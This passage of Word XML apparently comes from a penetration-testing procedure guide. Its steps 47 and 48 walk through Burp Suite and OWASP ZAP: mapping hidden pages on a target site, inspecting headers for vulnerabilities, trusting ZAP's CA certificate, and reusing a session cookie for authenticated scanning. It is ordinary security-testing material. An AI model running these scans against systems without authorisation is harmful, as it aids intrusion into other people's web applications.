            <w:r>
              <w:t>.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2397" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="5B697BAD" w14:textId="77777777" w:rsidR="003A4077" w:rsidRDefault="003A4077" w:rsidP="003A4077">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>burpsuite</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="002024A0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>burpsuite</w:t>
            </w:r>
            <w:r w:rsidRPr="002024A0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> is already installed on Kali Linux)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8019" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="78BA898A" w14:textId="77777777" w:rsidR="003A4077" w:rsidRPr="004E53E1" w:rsidRDefault="003A4077" w:rsidP="003A4077">
            <w:pPr>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004E53E1">
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t>IF THERE IS A WEBSITE ASSOCIATED WITH THE IP ADDRESS. OTHERWISE, SKIP.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="273B7057" w14:textId="77777777" w:rsidR="003A4077" w:rsidRDefault="003A4077" w:rsidP="003A4077">
            <w:r>
              <w:t>Use Burp Suite to gather interesting and potential hard to find pages within an IP addresses webserver.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E51812A" w14:textId="77777777" w:rsidR="003A4077" w:rsidRDefault="003A4077" w:rsidP="003A4077">
            <w:r>
              <w:t xml:space="preserve">Open with </w:t>
            </w:r>
            <w:r w:rsidRPr="008B4947">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">burpsuite </w:t>
            </w:r>
            <w:r w:rsidRPr="003C2CC4">
              <w:t xml:space="preserve">command </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">or find it’s icon in the system menu. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A4077" w14:paraId="1C09E8B2" w14:textId="77777777" w:rsidTr="003A4077">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="0EAD8E10" w14:textId="581CDF1C" w:rsidR="003A4077" w:rsidRDefault="003A4077" w:rsidP="003A4077">
            <w:r>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="003C01E2">
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:t>.b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2397" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="332FBB5A" w14:textId="77777777" w:rsidR="003A4077" w:rsidRDefault="003A4077" w:rsidP="003A4077">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8019" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="493346BC" w14:textId="77777777" w:rsidR="003A4077" w:rsidRDefault="003A4077" w:rsidP="003A4077">
            <w:r>
              <w:t>Use the tabs across the top; find and select ‘</w:t>
            </w:r>
            <w:r w:rsidRPr="00442B1B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Proxy’</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> and then ‘</w:t>
            </w:r>
            <w:r w:rsidRPr="00442B1B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Open Browser’</w:t>
            </w:r>
            <w:r>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>By default, the ‘I</w:t>
            </w:r>
            <w:r w:rsidRPr="00442B1B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>ntercept’</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> option will be </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>on</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> and you will be required to click ‘</w:t>
            </w:r>
            <w:r w:rsidRPr="004E53E1">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>F</w:t>
            </w:r>
            <w:r w:rsidRPr="00442B1B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>orward’</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> each time your computer handles a request in the browser.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F2D685F" w14:textId="77777777" w:rsidR="003A4077" w:rsidRDefault="003A4077" w:rsidP="003A4077">
            <w:r>
              <w:t>Turn on or off as needed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A4077" w14:paraId="1414F76B" w14:textId="77777777" w:rsidTr="003A4077">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="4330A285" w14:textId="5B965241" w:rsidR="003A4077" w:rsidRDefault="003A4077" w:rsidP="003A4077">
            <w:r>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="003C01E2">
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:t>.c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2397" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="3BD7A873" w14:textId="77777777" w:rsidR="003A4077" w:rsidRDefault="003A4077" w:rsidP="003A4077">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8019" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5B661F57" w14:textId="77777777" w:rsidR="003A4077" w:rsidRDefault="003A4077" w:rsidP="003A4077">
            <w:r>
              <w:t>As you move around the webpage in burp’s browser, check out what you can find hidden via the ‘</w:t>
            </w:r>
            <w:r w:rsidRPr="00442B1B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Target’</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> tab; then the ‘</w:t>
            </w:r>
            <w:r w:rsidRPr="00442B1B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Site</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="004E53E1">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>M</w:t>
            </w:r>
            <w:r w:rsidRPr="00442B1B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>ap’</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> tab.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77CD2518" w14:textId="77777777" w:rsidR="003A4077" w:rsidRDefault="003A4077" w:rsidP="003A4077">
            <w:r>
              <w:t>Open all the folders and search for any interesting pages; copy their URL and paste it into the browser to explore them.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A4077" w14:paraId="6ACF903A" w14:textId="77777777" w:rsidTr="003A4077">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="0364745B" w14:textId="631BB976" w:rsidR="003A4077" w:rsidRDefault="003A4077" w:rsidP="003A4077">
            <w:r>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="003C01E2">
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:t>.d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2397" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="3FD0682D" w14:textId="77777777" w:rsidR="003A4077" w:rsidRDefault="003A4077" w:rsidP="003A4077">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8019" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="39396B20" w14:textId="77777777" w:rsidR="003A4077" w:rsidRDefault="003A4077" w:rsidP="003A4077">
            <w:r>
              <w:t xml:space="preserve">Also, you can investigate the http </w:t>
            </w:r>
            <w:r w:rsidRPr="004E53E1">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Request</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> and </w:t>
            </w:r>
            <w:r w:rsidRPr="004E53E1">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Response</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> headers to search for possible vulnerabilities, including what PHP version is in use.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A4077" w14:paraId="4355D3AC" w14:textId="77777777" w:rsidTr="003A4077">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="37DCE699" w14:textId="77777777" w:rsidR="003A4077" w:rsidRDefault="003A4077" w:rsidP="003A4077"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2397" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="30875A38" w14:textId="77777777" w:rsidR="003A4077" w:rsidRDefault="003A4077" w:rsidP="003A4077">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8019" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="539CD9A1" w14:textId="77777777" w:rsidR="003A4077" w:rsidRPr="000C65EE" w:rsidRDefault="003A4077" w:rsidP="003A4077"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5DE5577C" w14:textId="77777777" w:rsidR="003A4077" w:rsidRDefault="003A4077"/>
    <w:p w14:paraId="14BE29AE" w14:textId="77777777" w:rsidR="003A4077" w:rsidRDefault="003A4077">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="01001069" w14:textId="65022DC2" w:rsidR="003A4077" w:rsidRDefault="003A4077" w:rsidP="003A4077">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Port, Service and Web Page Scanning: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OWASP ZAP</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="page" w:horzAnchor="margin" w:tblpY="976"/>
        <w:tblW w:w="11027" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="611"/>
        <w:gridCol w:w="2397"/>
        <w:gridCol w:w="8019"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DC2A77" w14:paraId="16718ABC" w14:textId="77777777" w:rsidTr="00393059">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="60804A46" w14:textId="4CD9D9A6" w:rsidR="00DC2A77" w:rsidRDefault="00DC2A77" w:rsidP="00393059">
            <w:r>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="003C01E2">
              <w:t>8</w:t>
            </w:r>
            <w:r>
              <w:t>.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2397" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="34AE4974" w14:textId="3EDC3573" w:rsidR="00DC2A77" w:rsidRDefault="00DC2A77" w:rsidP="00393059">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Zed Attack Proxy</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="002024A0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>ZAP</w:t>
            </w:r>
            <w:r w:rsidRPr="002024A0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> is already installed on Kali Linux)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8019" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1D44C1CE" w14:textId="77777777" w:rsidR="00DC2A77" w:rsidRPr="004E53E1" w:rsidRDefault="00DC2A77" w:rsidP="00393059">
            <w:pPr>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004E53E1">
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t>IF THERE IS A WEBSITE ASSOCIATED WITH THE IP ADDRESS. OTHERWISE, SKIP.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71CBCD6E" w14:textId="7167AC08" w:rsidR="00DC2A77" w:rsidRDefault="00DC2A77" w:rsidP="00393059">
            <w:r>
              <w:t>Use ZAP to gather interesting and potential hard to find pages within an IP addresses webserver and scan for potential vulnerabilities.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3294EDBF" w14:textId="442905B3" w:rsidR="00DC2A77" w:rsidRDefault="00DC2A77" w:rsidP="00393059">
            <w:r>
              <w:t>Open by searching for ZAP in the Applications.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DC2A77" w14:paraId="615CCA21" w14:textId="77777777" w:rsidTr="00393059">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="1CE419AD" w14:textId="269D395B" w:rsidR="00DC2A77" w:rsidRDefault="00DC2A77" w:rsidP="00393059">
            <w:r>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="003C01E2">
              <w:t>8</w:t>
            </w:r>
            <w:r>
              <w:t>.b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2397" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="75B9D158" w14:textId="77777777" w:rsidR="00DC2A77" w:rsidRDefault="00DC2A77" w:rsidP="00393059">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8019" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="624DE526" w14:textId="3ABC91B9" w:rsidR="00DC2A77" w:rsidRPr="00544539" w:rsidRDefault="00DC2A77" w:rsidP="00393059">
            <w:r>
              <w:t xml:space="preserve">First off, within </w:t>
            </w:r>
            <w:r w:rsidRPr="003A4077">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>‘Tools’</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">click on </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>‘Options’</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> to open the options menu. Here, first of all set ZAP to become a proxy by clicking </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>‘Local Proxies’</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> and setting the address to 127.0.0.1 and the port can stay 8080.</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>Don’t forget to configure the browser with your proxy address set within ZAP (and use port 8080, or whatever was set). This can be found usually in the ‘options’ or ‘preferences’ tab of your web browser and then use the search to find ‘Proxy’.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DC2A77" w14:paraId="1FCCD0EC" w14:textId="77777777" w:rsidTr="00393059">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="3FC34056" w14:textId="48761302" w:rsidR="00DC2A77" w:rsidRDefault="00DC2A77" w:rsidP="00393059">
            <w:r>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="003C01E2">
              <w:t>8</w:t>
            </w:r>
            <w:r>
              <w:t>.c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2397" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="4087EFBF" w14:textId="77777777" w:rsidR="00DC2A77" w:rsidRDefault="00DC2A77" w:rsidP="00393059">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8019" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4F2D8FBE" w14:textId="57A19400" w:rsidR="00DC2A77" w:rsidRDefault="00DC2A77" w:rsidP="00393059">
            <w:r>
              <w:t xml:space="preserve">Next, to ensure ZAP can scan pages that require SSL certificates to view (under the https protocol) we shall save the certificate of the ZAP proxy within our web browser. Within </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>‘Tools’ &gt; ‘Options’</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> navigate to the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>‘Dynamic SSL Certificates’</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> tab and save the certificate (using the save button).</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>Within your browser, open the ‘options’ or ‘preferences’ tab and search for/find the certificates option and click ‘view certificates’, proceed to import the recently saved certificate which can likely be found under an ‘authorities’ tab.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="752822D2" w14:textId="26D022CC" w:rsidR="00DC2A77" w:rsidRPr="00544539" w:rsidRDefault="00DC2A77" w:rsidP="00393059">
            <w:r>
              <w:t>Ensure tick boxes about ‘Trusting this CA to identify…’ are selected and click ‘ok’.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DC2A77" w14:paraId="5963CF4C" w14:textId="77777777" w:rsidTr="00393059">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="0F77A050" w14:textId="2306A5CB" w:rsidR="00DC2A77" w:rsidRDefault="00DC2A77" w:rsidP="00393059">
            <w:r>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="003C01E2">
              <w:t>8</w:t>
            </w:r>
            <w:r>
              <w:t>.d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2397" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="7B4DE7D6" w14:textId="77777777" w:rsidR="00DC2A77" w:rsidRDefault="00DC2A77" w:rsidP="00393059">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8019" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="76C40795" w14:textId="7E723376" w:rsidR="00DC2A77" w:rsidRPr="002E56F6" w:rsidRDefault="00DC2A77" w:rsidP="00393059">
            <w:r>
              <w:t>Next, if the web app we wish to scan requires authentication, you will need to log in first via your browser and then pass over the authentication token to ZAP. Take note of the session ID cookie (usually PHPSESSID, its ‘value’).</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t xml:space="preserve">Back in ZAP, click the green ‘+’ to create a new </w:t>
            </w:r>
            <w:r w:rsidRPr="007A2151">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">‘HTTP sessions’ </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">tab. Use the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>‘Site’</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> dropdown arrow and select the IP address of the site we are targeting.</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t xml:space="preserve">In the bottom configuration panel, right click the session with our session token and select </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>‘Active Session’</w:t>
            </w:r>
            <w:r>
              <w:t>, a green tick should be displayed. The session ID value should be the same as the one observed within the web browser.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DC2A77" w14:paraId="3B106933" w14:textId="77777777" w:rsidTr="00393059">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
